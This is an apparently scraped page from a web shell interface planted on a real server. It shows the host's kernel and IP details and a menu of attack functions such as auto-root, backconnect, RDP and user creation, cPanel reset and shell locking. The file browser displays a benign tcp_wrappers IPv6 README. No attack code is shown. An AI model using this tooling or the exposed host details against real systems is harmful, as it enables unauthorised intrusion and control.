Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 52.15.223.239
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
tcp_wrappers-7.6 /
[ HOME SHELL ]
Name
Size
Permission
Action
BLURB
1.7
KB
-rw-r--r--
Banners.Makefile
2.17
KB
-rw-r--r--
CHANGES
18.75
KB
-rw-r--r--
DISCLAIMER
792
B
-rw-r--r--
README
47.08
KB
-rw-r--r--
README.IRIX
2.57
KB
-rw-r--r--
README.NIS
6.52
KB
-rw-r--r--
README.ipv6
1.12
KB
-rw-r--r--
README.ipv6.2
231
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.ipv6
The IPV6 code is enabled by uncommenting IPV6 = -DHAVE_IPV6 Check your system specific make line for the entry IPV6="$(IPV6)"; it has not been added to most yet. The code was tested on Solaris 8 Beta. A single tcpd binary supports IPV6 and IPV4 sockets as well as TLI (v4/v6). The code successfully compiles on Solaris 7 + playground.sun.com IPV6 patch, but I have not tested the binary. The code also compiles on AIX using "-DHAVE_IPV6 -DUSE_GETHOSTBYNAME2" The KILL_IPOPTIONS option doesn't work. (Something to do with IPV4 addresses mapped inside IPV6 sockets) The code extends the hosts.{allow,deny} syntax in a minor way. You can now specify IPV6 address, like this: # Ipv6 numeric address someservice: [x:x:x::x] # Ipv6 network otherservice: [x:x:x::x/prefix] Note that the "[" and "]" are part of the syntax; no whitespace is allowed inside the []. The datastructures have been modified such that we hope that libwrap binary compatibility is maintained. The original tcp_wrappers-7.6 files have been renamed and have a .org extension; only this file (README.ipv6) was added. Casper Dik (Casper.Dik@Holland.Sun.COM)
Close